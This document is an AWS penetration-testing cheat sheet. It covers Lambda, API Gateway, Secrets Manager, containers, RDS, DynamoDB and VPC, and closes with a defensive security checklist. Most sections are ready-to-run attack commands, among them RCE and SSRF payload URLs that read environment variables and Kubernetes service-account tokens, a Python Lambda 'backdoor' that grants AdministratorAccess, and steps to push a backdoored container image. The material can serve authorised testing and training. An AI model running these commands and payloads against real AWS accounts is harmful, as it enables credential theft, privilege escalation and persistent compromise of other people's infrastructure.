# Advanced AWS Penetration Testing Reference ## Table of Contents - [Training Resources](#training-resources) - [Extended Tools Arsenal](#extended-tools-arsenal) - [AWS API Calls That Return Credentials](#aws-api-calls-that-return-credentials) - [Lambda & API Gateway](#lambda--api-gateway) - [Secrets Manager & KMS](#secrets-manager--kms) - [Container Security (ECS/EKS/ECR)](#container-security-ecseksecr) - [RDS Database Exploitation](#rds-database-exploitation) - [DynamoDB Exploitation](#dynamodb-exploitation) - [VPC Enumeration & Lateral Movement](#vpc-enumeration--lateral-movement) - [Security Checklist](#security-checklist) --- ## Training Resources | Resource | Description | URL | |----------|-------------|-----| | AWSGoat | Damn Vulnerable AWS Infrastructure | github.com/ine-labs/AWSGoat | | Cloudgoat | AWS CTF-style scenario | github.com/RhinoSecurityLabs/cloudgoat | | Flaws | AWS security challenge | flaws.cloud | | SadCloud | Terraform for vuln AWS | github.com/nccgroup/sadcloud | | DVCA | Vulnerable Cloud App | medium.com/poka-techblog | --- ## Extended Tools Arsenal ### weirdAAL - AWS Attack Library ```bash python3 weirdAAL.py -m ec2_describe_instances -t demo python3 weirdAAL.py -m lambda_get_account_settings -t demo python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2' ``` ### cloudmapper - AWS Environment Analyzer ```bash git clone https://github.com/duo-labs/cloudmapper.git pipenv install --skip-lock pipenv shell # Commands report # Generate HTML report iam_report # IAM-specific report audit # Check misconfigurations collect # Collect account metadata find_admins # Identify admin users/roles ``` ### cloudsplaining - IAM Security Assessment ```bash pip3 install --user cloudsplaining cloudsplaining download --profile myawsprofile cloudsplaining scan --input-file default.json ``` ### s3_objects_check - S3 Object Permissions ```bash git clone https://github.com/nccgroup/s3_objects_check python s3-objects-check.py -p whitebox-profile -e blackbox-profile ``` ### dufflebag - Find EBS Secrets ```bash # Finds secrets exposed via Amazon EBS's "public" mode git clone https://github.com/BishopFox/dufflebag ``` --- ## AWS API Calls That Return Credentials | API Call | Description | |----------|-------------| | `chime:createapikey` | Create API key | | `codepipeline:pollforjobs` | Poll for jobs | | `cognito-identity:getopenidtoken` | Get OpenID token | | `cognito-identity:getcredentialsforidentity` | Get identity credentials | | `connect:getfederationtoken` | Get federation token | | `ecr:getauthorizationtoken` | ECR auth token | | `gamelift:requestuploadcredentials` | GameLift upload creds | | `iam:createaccesskey` | Create access key | | `iam:createloginprofile` | Create login profile | | `iam:createservicespecificcredential` | Service-specific creds | | `lightsail:getinstanceaccessdetails` | Instance access details | | `lightsail:getrelationaldatabasemasteruserpassword` | DB master password | | `rds-db:connect` | RDS connect | | `redshift:getclustercredentials` | Redshift credentials | | `sso:getrolecredentials` | SSO role credentials | | `sts:assumerole` | Assume role | | `sts:assumerolewithsaml` | Assume role with SAML | | `sts:assumerolewithwebidentity` | Web identity assume | | `sts:getfederationtoken` | Federation token | | `sts:getsessiontoken` | Session token | --- ## Lambda & API Gateway ### Lambda Enumeration ```bash # List all lambda functions aws lambda list-functions # Get function details and download code aws lambda get-function --function-name FUNCTION_NAME wget -O lambda-function.zip "url-from-previous-query" # Get function policy aws lambda get-policy --function-name FUNCTION_NAME # List event source mappings aws lambda list-event-source-mappings --function-name FUNCTION_NAME # List Lambda layers (dependencies) aws lambda list-layers aws lambda get-layer-version --layer-name NAME --version-number VERSION ``` ### API Gateway Enumeration ```bash # List REST APIs aws apigateway get-rest-apis # Get specific API info aws apigateway get-rest-api --rest-api-id ID # List endpoints (resources) aws apigateway get-resources --rest-api-id ID # Get method info aws apigateway get-method --rest-api-id ID --resource-id RES_ID --http-method GET # List API versions (stages) aws apigateway get-stages --rest-api-id ID # List API keys aws apigateway get-api-keys --include-values ``` ### Lambda Credential Access ```bash # Via RCE - get environment variables https://apigateway/prod/system?cmd=env # Via SSRF - access runtime API https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/invocation/ # Via file read https://apigateway/prod/system?cmd=file:///proc/self/environ ``` ### Lambda Backdooring ```python # Malicious Lambda code to escalate privileges import boto3 import json def handler(event, context): iam = boto3.client("iam") iam.attach_role_policy( RoleName="role_name", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess" ) iam.attach_user_policy( UserName="user_name", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess" ) return {'statusCode': 200, 'body': json.dumps("Pwned")} ``` ```bash # Update function with backdoor aws lambda update-function-code --function-name NAME --zip-file fileb://backdoor.zip # Invoke backdoored function curl https://API_ID.execute-api.REGION.amazonaws.com/STAGE/ENDPOINT ``` --- ## Secrets Manager & KMS ### Secrets Manager Enumeration ```bash # List all secrets aws secretsmanager list-secrets # Describe specific secret aws secretsmanager describe-secret --secret-id NAME # Get resource policy aws secretsmanager get-resource-policy --secret-id ID # Retrieve secret value aws secretsmanager get-secret-value --secret-id ID ``` ### KMS Enumeration ```bash # List KMS keys aws kms list-keys # Describe key aws kms describe-key --key-id ID # List key policies aws kms list-key-policies --key-id ID # Get full policy aws kms get-key-policy --policy-name NAME --key-id ID ``` ### KMS Decryption ```bash # Decrypt file (key info embedded in ciphertext) aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext ``` --- ## Container Security (ECS/EKS/ECR) ### ECR Enumeration ```bash # List repositories aws ecr describe-repositories # Get repository policy aws ecr get-repository-policy --repository-name NAME # List images aws ecr list-images --repository-name NAME # Describe image aws ecr describe-images --repository-name NAME --image-ids imageTag=TAG ``` ### ECS Enumeration ```bash # List clusters aws ecs list-clusters # Describe cluster aws ecs describe-clusters --cluster NAME # List services aws ecs list-services --cluster NAME # Describe service aws ecs describe-services --cluster NAME --services SERVICE # List tasks aws ecs list-tasks --cluster NAME # Describe task (shows network info for pivoting) aws ecs describe-tasks --cluster NAME --tasks TASK_ARN # List container instances aws ecs list-container-instances --cluster NAME ``` ### EKS Enumeration ```bash # List EKS clusters aws eks list-clusters # Describe cluster aws eks describe-cluster --name NAME # List node groups aws eks list-nodegroups --cluster-name NAME # Describe node group aws eks describe-nodegroup --cluster-name NAME --nodegroup-name NODE_NAME # List Fargate profiles aws eks list-fargate-profiles --cluster-name NAME ``` ### Container Backdooring ```bash # Authenticate Docker to ECR aws ecr get-login-password --region REGION | docker login --username AWS --password-stdin ECR_ADDR # Build backdoored image docker build -t image_name . # Tag for ECR docker tag image_name ECR_ADDR:IMAGE_NAME # Push to ECR docker push ECR_ADDR:IMAGE_NAME ``` ### EKS Secrets via RCE ```bash # List Kubernetes secrets https://website.com/rce.php?cmd=ls /var/run/secrets/kubernetes.io/serviceaccount # Get service account token https://website.com/rce.php?cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token ``` --- ## RDS Database Exploitation ### RDS Enumeration ```bash # List RDS clusters aws rds describe-db-clusters # List RDS instances aws rds describe-db-instances # Check: IAMDatabaseAuthenticationEnabled: false = password auth # List subnet groups aws rds describe-db-subnet-groups # List security groups aws rds describe-db-security-groups # List proxies aws rds describe-db-proxies ``` ### Password-Based Access ```bash mysql -h HOSTNAME -u USERNAME -P PORT -p ``` ### IAM-Based Access ```bash # Generate auth token TOKEN=$(aws rds generate-db-auth-token \ --hostname HOSTNAME \ --port PORT \ --username USERNAME \ --region REGION) # Connect with token mysql -h HOSTNAME -u USERNAME -P PORT \ --enable-cleartext-plugin --password=$TOKEN ``` --- ## DynamoDB Exploitation ```bash # List tables aws dynamodb list-tables # Scan table contents aws dynamodb scan --table-name TABLE_NAME | jq -r '.Items[]' # Query specific items aws dynamodb query --table-name TABLE_NAME \ --key-condition-expression "pk = :pk" \ --expression-attribute-values '{":pk":{"S":"user"}}' ``` --- ## VPC Enumeration & Lateral Movement ### VPC Enumeration ```bash # List VPCs aws ec2 describe-vpcs # List subnets aws ec2 describe-subnets --filters "Name=vpc-id,Values=VPC_ID" # List route tables aws ec2 describe-route-tables --filters "Name=vpc-id,Values=VPC_ID" # List Network ACLs aws ec2 describe-network-acls # List VPC peering connections aws ec2 describe-vpc-peering-connections ``` ### Route Table Targets | Destination | Target | Description | |-------------|--------|-------------| | IP | `local` | VPC internal | | IP | `igw` | Internet Gateway | | IP | `nat` | NAT Gateway | | IP | `pcx` | VPC Peering | | IP | `vpce` | VPC Endpoint | | IP | `vgw` | VPN Gateway | | IP | `eni` | Network Interface | ### Lateral Movement via VPC Peering ```bash # List peering connections aws ec2 describe-vpc-peering-connections # List instances in target VPC aws ec2 describe-instances --filters "Name=vpc-id,Values=VPC_ID" # List instances in specific subnet aws ec2 describe-instances --filters "Name=subnet-id,Values=SUBNET_ID" ``` --- ## Security Checklist ### Identity and Access Management - [ ] Avoid use of root account - [ ] MFA enabled for all IAM users with console access - [ ] Disable credentials unused for 90+ days - [ ] Rotate access keys every 90 days - [ ] Password policy: uppercase, lowercase, symbol, number, 14+ chars - [ ] No root access keys exist - [ ] MFA enabled for root account - [ ] IAM policies attached to groups/roles only ### Logging - [ ] CloudTrail enabled in all regions - [ ] CloudTrail log file validation enabled - [ ] CloudTrail S3 bucket not publicly accessible - [ ] CloudTrail integrated with CloudWatch Logs - [ ] AWS Config enabled in all regions - [ ] CloudTrail logs encrypted with KMS - [ ] KMS key rotation enabled ### Networking - [ ] No security groups allow 0.0.0.0/0 to port 22 - [ ] No security groups allow 0.0.0.0/0 to port 3389 - [ ] VPC flow logging enabled - [ ] Default security group restricts all traffic ### Monitoring - [ ] Alarm for unauthorized API calls - [ ] Alarm for console sign-in without MFA - [ ] Alarm for root account usage - [ ] Alarm for IAM policy changes - [ ] Alarm for CloudTrail config changes - [ ] Alarm for console auth failures - [ ] Alarm for CMK disabling/deletion - [ ] Alarm for S3 bucket policy changes - [ ] Alarm for security group changes - [ ] Alarm for NACL changes - [ ] Alarm for VPC changes